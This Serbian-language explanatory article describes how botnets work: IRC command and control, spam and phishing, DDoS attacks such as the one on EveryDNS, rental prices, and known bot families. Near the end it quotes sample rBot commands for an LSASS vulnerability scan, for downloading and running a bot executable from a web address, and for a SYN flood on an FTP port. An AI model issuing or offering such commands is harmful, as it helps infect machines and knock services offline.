BotNet

BotNet označava mrežu zaraženih računara na Internetu. Termin je nastao spajanjem reči BOT (od Robot) i NET, koja znači mreža. BotNet mrežu je moguće daljinski kontrolisati i najčešće se koristi za slanje SPAM pošte ili organizovanje DDoS napada.  BotNet ili Zombi mreža, danas se može iznajmiti za stotinak dolara i smatra se da je od 5 do 12 miliona računara širom sveta u uključeno u nekoj od BotNet mreža. Najčeće se radi o kućnim PC računarima, bez adekvatne Firewall i Anti-Virus zaštite.

Mehanizam rada

Zombi računar nastaje posle zaraze virusom koji otvara TCP komunikacioni port preko koga se u računar neovlašćeno ubacuje Trojan program. Ovaj program se kasnije, prema potrebi aktivira za neki od zadataka kao što su slanje SPAM pošte, širenje drugih virusa ili DDoS napad na neki Web sajt ili DNS sistem.

BotNet mreža se formira iz komercijalnih razloga, što može biti zarada od slanja SPAM pošte ili ometanje konkurencije. Najveći problem za organizatora ovakvih operacija je upravo komandna kontrola mreže. Osnovni cilj je da “kontrola” ostane nevidljiva za korisnika, zbog čega se često koristi komunikacija putem IRC (čet) kanala. To, na primer, znači da se Trojan komponenta povremeno priključuje na neki javni IRC kanal, sa koga dobija dalje instrukcije šta treba da “uradi”.

IRC BOT je nešto stariji termin i tehnologija, koja je našla svoje mesto u savremenim BotNet mrežama. Radi se o raznim programima koji su kompatibilni sa IRC specifikacijom (RFC 1459) i koji pasionirani korisnici IRC sistema koriste za svoje (uglavnom normalne) potrebe. U kontekstu BotNet mreže, IRC BOT je zlonamerni program koji uspostvalja kontrolu nad Trojan komponentama koje su se prijavile na kontrolnom IRC kanalu.

Ova zloupotreba IRC-a je dovela do toga da većina konvencionalnih IRC sistema blokira pristup sa poznatih BotNet mreža, tako da “kontroleri” moraju da nađu nove ili čak formiraju sopstvene ilegalne IRC servere.

Zombi računar ne mora da obavezno koristi IRC sistem kontrole. To može biti i Web pristup preko kompromitovanog Web servera. Suština je da Trojan/BOT komponenta pokrene konekciju ka nekom uobičajenom servisu (kao što je Web ili IRC) i tako ostane neprimećena i odobrena od Firewall-a.

SPAM i Phishing

Prema novijim analizama, smatra se da je oko 200 pojedinaca ili grupa odgovorno za slanje 80% SPAM pošte širom sveta. Postoje top liste najnotornijih spamera na kojima se nalaze organizatori iz Ukrajine, Rusije, SAD i Kine.

SPAM pošta se efektivno filtrira primenom DNS “crnih listi” (RBL), Međutim kako je SPAM pošta došla posredstvom neke Zombi mreže, ista mreža se može okrenuti protiv DNS sistema koji hostuje pojedinu crnu listu.

Slična situacija je i sa anti-Phishing sistemima. Zombi mreža se lako usmerava protiv DNS sistema koji obezbeđuje rad anti-Phishing sistema.

Efekti

Ovakvih slučajeva ima sve više i više. Skorašnji primer (početkom decembra) je DDoS napad na EveryDNS radi obaranja PhishTank anti-Phishing sistema. (Phishing je pokušaj krađe podataka o nečijem računu u banci, a Phishing poruke se šalju SPAM mrežom.) Na vrhuncu napada, EveryDNS je zasut saobraćajem od preko 400 Mbps (miliona-bita-u-sekundi) po sistemu, na 4 lokacije širom sveta.

Možemo da pretpostavimo i procenimo da su za ovakav napad bile potrebne Zombi mreže sa ukupno 8.000 računara. Prema novijim podacima, na crnom tržištu Zombi sistem od 5.500 računara se može iznajmiti za samo 350 dolara nedeljno. Ovime dolazimo do budžeta manjeg od 1.000 dolara za napadača i neuporedivo većom štetom za napadnut sistem.

U ovakvim situacijama, zbog nesrazmerno velike snage DDoS napada, napadnuti (sistem) teško može da se odbrani. Problem je utoliko veći, što napad dolazi sa raznih strana sveta, tako da ne možete jednostavno da iskučite pojedine regije ili opsege adresa i time umanjite efekat napada. Tehnički gledano, u trenutku intenzivnog DDoS napada filtriranje saobraćaja ne daje rezultat jer će ruta do filtera biti preopterećena.

EveryDNS se prema svom saopštenju “uspešno odbranio”. Svojim ISP provajderima zameraju što su im povremeno potpuno blokirali saobraćaj, umesto da samo “filtriraju” i time održe njihov sistem u radu.

BOT-ovi

Pokušaćemo ukratko da prikažemo savremene IRC BOT komponente.

• Agobot/Phatbot/Forbot/XtremBot
  Registrovano je preko 500 verzija Agobot-a, zahvaljujući tome što je napisan u C++ jeziku i što je izvorni kod dostupan. Sadrži Sniffer i Rootkit zaštitu.

• SDBot/RBot/UrBot
  Radi se o trenutno najaktivnijoj grupi IRC Bot-ova. Napisan je u C jeziku i to loše, u poređenju sa Agobot-om. Veoma je popularan.

• mIRC BOTovi - GT-Bot
  mIRC je popularni IRC klijent za Windows, odakle i potiče ime ove grupe BOT-ova. GT je skraćenica od Global Threat (globalna opasnost).

• DSNX Bot
  Dataspy Network X je napisan u C++ jeziku i poseduje sistem Plugin-a, koji omogućavaju dalje širenje, DDoS napade, Portscan interfejs i skriveni Web server.

• Q8
  Q8 je veoma mali, napisan je u manje od 1.000 linija C-koda, isključivo za Unix/Linux platformu. Sadrži: izmenu koda putem HTTP protokola, razne DDOS napade (SYN Flood i UDP Flood)

Po pokretanju IRC BOT pokušava da se prijavi na predefinisani IRC server i privatni (šifrom zaštićeni) kanal. Po uspešnoj prijavi dobijaju komande za dalje širenje, na primer:

1. ".advscan lsass 200 5 0 -r -s"

2. ".http.update http:///~mugenxu/rBot.exe c:\msy32awds.exe 1"

U primeru je data sintaksa za ispitivanje Windows LSASS slabosti, na bazi 200 konkurentnih paraleleni procesa, beskonačnim vremenom skeniranja (0) i slučajnim principom odabira adrese koja se ispituje (-r).

Druga komanda je primer učitavanja i pokretanja programa sa date Web adrese. Ako na toj adresi nema odgovarajućeg programa, IRC BOT čeka dalje komande.

DDoS napad ima sledeću sintaksu:

1. .scanstop

2. .ddos.syn XX.X.XXX.XXX.XXX  21  200

3. [DDoS]: Flooding: (XXX.XXX.XXX.XXX:21) for 200 seconds

 Radi se o SYN-Flood napadu na FTP server (tcp/21) u trajanju od 200 sekundi (od strane  jednog Zombi računara iz BotNet mreže). 

BOT serveri

IRC serveri na kojima se obavlja prijava BOT-ova su najčešće kompomotivane mašine. Samo BotNet početnici koriste javne servere, jer već sa 1.000 članova Zombi zajednice prave veliki saobraćaj tokom prijave. Teško je objasniti šta na nekom IRC kanalu radi 1.000 klijenata sa imenom rbot-xxxxxx.

Za potrebe upravljanjem BotNet mrežama koriste se modifikovane, “olakšane” i optimizovane verzije IRC servera, koji mogu da podrže i do 80.000 Zombi klijenata.

Profesionalno vođeni sistemi imaju unikatni sistem komandi između servera i modifikovanih klijenata (tipa Agobot ili SDBot).

Zaključak

Prema podacima HoneyNet organizacije, koja se bavi ispitivnjem rada BotNet mreža metodom izlaganja nezaštićenih računara, tokom 4 meseca istraživanja detektovano je preko 100 BotNet mreža, koje su kontrolisale preko 200.000 različitih IP adresa. Primećene su  mreže sa nekoliko stotina, pa i do 50.000 Zombi računara, a kao poseban kuriuizetet je “slučaj” jednog kućnog računara koji je bio zaražen sa 16 različitih Bot-ova.

U ovom trenutku nema tačnih podataka o globalnoj veličini BotNet mreža, a procene su deprimirajuće. Srećom, postoje decentralizovani provajderi (kao što je Akamai) koji su u stanju da se odupru većim DDoS napadima.

BotNet mreže su veliki problem kome se treba organizovano suprotstaviti.